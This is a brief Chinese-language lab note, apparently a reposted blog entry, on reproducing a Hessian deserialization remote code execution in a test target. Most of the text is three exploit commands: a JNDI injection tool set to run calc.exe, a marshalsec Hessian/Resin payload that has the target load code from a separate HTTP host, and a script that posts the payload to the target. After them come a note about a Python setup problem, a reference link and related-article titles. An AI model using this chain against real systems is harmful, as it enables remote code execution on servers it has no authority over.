靶機搭建

啟動JNDI利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 192.168.31.102

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://192.168.31.102:8180/ ExecTemplateJDK7>hession

python hessian.py -u http://192.168.31.36:8080/HessianTest/hessian -p hession

這里的報錯是因為我python環境的問題
這里我踩了一個坑,hessian.py里需要用到一個argparse包,我本機的環境一直出問題,最后更新了pip,更新了argparse包才搞定

HTTP發送二進制的數據包 ???
參考:https://www.freebuf.com/vuls/224280.html

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 fastjson<=1.2.47反序列化RCE漏洞 Apache Shiro<=1.2.4反序列化RCE漏洞 Apache Shiro 反序列化RCE漏洞 hessian 反序列化問題 Hessian 序列化和反序列化實現 CVE-2018-2628 weblogic WLS反序列化漏洞--RCE學習筆記 (CVE-2020-7961)Liferay Portal RCE 反序列化命令執行漏洞 PHP反序列化漏洞 PHP反序列化漏洞 PHP反序列化漏洞